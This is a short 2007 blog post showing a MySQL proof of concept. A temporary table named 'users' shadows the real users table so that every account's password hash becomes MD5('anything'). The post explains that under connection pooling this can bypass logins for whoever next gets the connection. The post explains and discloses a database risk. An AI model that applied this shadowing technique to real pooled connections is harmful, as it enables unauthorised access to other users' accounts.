Morgan Tocker (![[info]](http://l-stat.livejournal.com/img/userinfo.gif){kind=small} mtocker) wrote,@ 2007-12-15 15:11:00 |
|
| Entry tags: | mysql, php |
Proof of concept attack when using connection pooling.
mysql> create database attack;
Query OK, 1 row affected (0.00 sec)
mysql> use attack;
Database changed
mysql> create table users (id INT UNSIGNED NOT NULL PRIMARY KEY auto_increment, username varchar(30) NOT NULL,
password char(32) NOT NULL, UNIQUE KEY (username));
Query OK, 0 rows affected (0.00 sec)
mysql> INSERT into users (username, password) VALUES ('morgo', MD5('my_password')),
('ted', MD5('another_password'));
Query OK, 2 rows affected (0.41 sec)
Records: 2 Duplicates: 0 Warnings: 0
mysql> SELECT * FROM users;
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | morgo | a865a7e0ddbf35fa6f6a232e0893bea4 |
| 2 | ted | 280fb9194368f9d1d44f8ddcc13f2717 |
+----+----------+----------------------------------+
2 rows in set (0.00 sec)
mysql> CREATE TEMPORARY TABLE users_copy LIKE users;
Query OK, 0 rows affected (0.04 sec)
mysql> INSERT into users_copy SELECT id, username, md5('anything') FROM users;
Query OK, 2 rows affected (0.00 sec)
Records: 2 Duplicates: 0 Warnings: 0
mysql> CREATE TEMPORARY TABLE users LIKE users_copy;
Query OK, 0 rows affected (0.01 sec)
mysql> INSERT INTO users SELECT * FROM users_copy;
Query OK, 2 rows affected (0.00 sec)
Records: 2 Duplicates: 0 Warnings: 0
mysql> SELECT * FROM users;
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | morgo | f0e166dc34d14d6c228ffac576c9a43c |
| 2 | ted | f0e166dc34d14d6c228ffac576c9a43c |
+----+----------+----------------------------------+
2 rows in set (0.00 sec)
Notice the subtle attack? It's a documented feature that you can have a temporary table by the same name as a base table, and the temporary table takes precedence.
Normally this isn't a problem, because a temporary table is only available in the current session, but if you are using connection pooling the next person to get your connection may not get what they expected.
